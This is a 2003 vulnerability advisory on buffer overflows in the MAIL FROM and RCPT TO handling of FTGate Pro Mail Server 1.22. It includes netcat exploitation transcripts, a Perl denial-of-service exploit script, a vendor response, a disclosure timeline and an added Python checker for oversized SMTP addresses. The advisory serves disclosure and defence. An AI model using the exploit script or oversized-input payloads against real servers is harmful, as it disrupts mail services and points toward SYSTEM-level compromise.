FTGate Pro Mail Server v. 1.22 Multiple Buffer Overflow Vulnerabilities (2003)





                    Multiple Buffer Overflow Vulnerabilities
                 Found in FTGate Pro Mail Server v. 1.22 (1328)
                           http://www.ftgate.com

                          Discovered by Dennis Rand
                             www.Infowarfare.dk
------------------------------------------------------------------------


-----[SUMMARY
FTGatePro is Floosietek's flagship server. The comprehensive feature set
in this server ensures that it will meet whatever demands you place on it.
This server is powerful enough for the most demanding of tasks.

The problem is a buffer overflow in the SMTP protocol handling of the
ESMTP Server FTGate, causing the service to stop responding for a short
period. The overflow can overwrite the exception handler on the stack,
allowing a system compromise with code execution running as SYSTEM.


-----[AFFECTED SYSTEMS
Vulnerable systems:
 * FTGate Pro Mail Server v. 1.22 (1328)

Immune systems:
 * FTGate Pro Mail Server v. 1.22 (HotFix 1330)

-----[SEVERITY
Medium/High - An attacker is able to cause a DoS attack on the SMTP
              protocol, and can overwrite the exception handler on the
              stack, allowing a system compromise with code execution
              running as SYSTEM.

-----[DESCRIPTION OF WHAT THE VULNERABILITY IS
The vulnerability is a buffer overflow in FTGate Pro Mail Server v. 1.22
(1328). When a malicious attacker sends a large amount of data as the
argument to the "MAIL FROM" or the "RCPT TO" command, the buffer will
overflow. If the input were carefully crafted, attackers could execute
arbitrary commands with system privileges.

The following transcript demonstrates a sample exploitation of the
vulnerabilities:
----------------------------- [Transcript] -----------------------------
nc warlab.dk 25
220 win2k-serv ESMTP Server FTGate
HELO Foobar
250 win2k-serv
Mail From : <aaaaa....[BUFFER about 2000 Bytes @ and 2000 bytes again ending
with ".com"]
<Connection closed>

The same vulnerability is in the RCPT TO command:
nc warlab.dk 25
220 win2k-serv ESMTP Server FTGate
HELO Foobar
250 win2k-serv
Mail From : admin@warlab.dk
250 <admin@warlab.dk> Sender Ok
Rcpt To: <aaaaa....[BUFFER about 2000 Bytes @ and 2000 bytes again ending
with ".com"]
<connection closed>
----------------------------- [Transcript] -----------------------------

----------------------------- [Exploit Code] -----------------------------
#!/usr/bin/perl -w
##################
# FTGate Pro Mail Server v. 1.22 (1328) DoS attack
#
# URL:   http://www.infowarfare.dk/
# EMAIL: der@infowarfare.dk
# USAGE: sploit.pl <target ip>
#
# Summary:
#
# The problem is a Buffer Overflow in the SMTP protocol, within the
# ESMTP Server FTGate, causing the service to stop responding for a short
# period, where we can actually overwrite the exception handler on the stack
# allowing a system compromise with code execution running as SYSTEM.
#
# Solution:
# Upgrade to FTGate Pro Mail Server v. 1.22 (HotFix 1330) or later
#

use IO::Socket;

my $target = shift() || "warlab.dk";
my $port   = 25;
my $Buffer = "a" x 2400;     # oversized address fragment, 2400 bytes

my $sock = IO::Socket::INET->new (
                                    PeerAddr => $target,
                                    PeerPort => $port,
                                    Proto    => 'tcp'
                                 ) || die "could not connect: $!";

my $banner = <$sock>;
if ($banner !~ /^2.*/)
{
    print STDERR "Error: invalid server response '$banner'.\n";
    exit(1);
}

print $sock "HELO $target\r\n";
my $resp = <$sock>;

print $sock "MAIL FROM: $Buffer\@$Buffer.dk\r\n";
$resp = <$sock>;

print $sock "\r\n";
print $sock "\r\n\r\n\r\n\r\n\r\n\r\n";

close($sock);
----------------------------- [Exploit Code] -----------------------------

When this attack is performed the service will stop for a short time and
then restart after about 5-10 seconds; all connections that are open when
the attack is performed will be closed.


-----[DETECTION
FTGate Pro Mail Server v. 1.22 (1328) is vulnerable to the above-described
attacks. Earlier versions may be susceptible as well. To determine if a
specific implementation is vulnerable, experiment by following the above
transcript.
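As an added example that is not part of the original advisory, the following Python checker flags MAIL FROM / RCPT TO arguments that exceed the RFC 5321 length limits (64-octet local-part, 255-octet domain, 256-octet path), which is the simplest way to spot the oversized addresses this advisory describes in an SMTP log or on a filtering proxy before they reach a vulnerable server. The function names and the sample transcript are constructed for this example; the last sample line reproduces the 2000 + 2000 byte pattern from the transcript above.

```python
import re

# RFC 5321 (section 4.5.3.1) size limits in octets.  The advisory's crash
# input is a MAIL FROM / RCPT TO argument of about 2000 bytes before the "@"
# and 2000 more after it, far beyond any of these.
MAX_LOCAL_PART = 64
MAX_DOMAIN = 255
MAX_PATH = 256

# Only MAIL FROM and RCPT TO are inspected: those are the two commands the
# advisory shows overflowing.
_CMD_RE = re.compile(r'^(MAIL\s+FROM|RCPT\s+TO)\s*:\s*(.*)$', re.IGNORECASE)

def check_smtp_command(line):
    """Return a list of findings for one client command line (empty = OK)."""
    m = _CMD_RE.match(line.strip())
    if not m:
        return []
    cmd = re.sub(r'\s+', ' ', m.group(1).upper())
    # The path is the first token; ESMTP parameters such as SIZE= may follow.
    tokens = m.group(2).split()
    path = tokens[0] if tokens else ''
    if path.startswith('<') and path.endswith('>'):
        path = path[1:-1]
    findings = []
    if len(path) > MAX_PATH:
        findings.append('%s: path is %d octets (limit %d)' % (cmd, len(path), MAX_PATH))
    local, at, domain = path.rpartition('@')
    if at and len(local) > MAX_LOCAL_PART:
        findings.append('%s: local-part is %d octets (limit %d)'
                        % (cmd, len(local), MAX_LOCAL_PART))
    if at and len(domain) > MAX_DOMAIN:
        findings.append('%s: domain is %d octets (limit %d)' % (cmd, len(domain), MAX_DOMAIN))
    return findings

def scan_session(lines):
    """Run check_smtp_command over a captured client-to-server transcript."""
    return [(n, f) for n, line in enumerate(lines, 1)
            for f in check_smtp_command(line)]

# Constructed sample transcript: the benign lines mirror the advisory's
# session; the last line reproduces the ~2000 + 2000 byte crash pattern.
SAMPLE_SESSION = [
    'HELO Foobar',
    'Mail From : admin@warlab.dk',
    'Rcpt To: <' + 'a' * 2000 + '@' + 'a' * 2000 + '.com>',
]
```

Running scan_session(SAMPLE_SESSION) reports three findings, all on line 3 (path, local-part and domain each over the limit), and nothing for the benign lines.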


-----[WORK AROUNDS
Upgrade to FTGate Pro Mail Server v. 1.22 (HotFix 1330)


-----[VENDOR RESPONSE
Hi,
Thank you for bringing this to my attention.
We have fixed the problem with the code and will release a patch shortly.
Regards
Richard Bang
Floosietek Ltd
richard@ftgate.com
http://www.floosietek.com

Hi,

The patch should be up later today.
New users will automatically download the patched version.
Existing users download it through the WebAdmin UI.
Regards
Richard Bang
Floosietek Ltd
richard@ftgate.com
http://www.floosietek.com


-----[DISCLOSURE TIMELINE
20/04/2003 Found the Vulnerability, and made an analysis.
23/04/2003 Contacted Vendor at support@ftgate.com
29/04/2003 Received response from Vendor
05/05/2003 Contacted vendor for update
06/05/2003 Received response from vendor
06/05/2003 Public Disclosure.


-----[ADDITIONAL INFORMATION
The vulnerability was discovered and reported by Dennis Rand
<der@infowarfare.dk>

-----[DISCLAIMER
The information in this bulletin is provided "AS IS" without warranty of any
kind. In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.




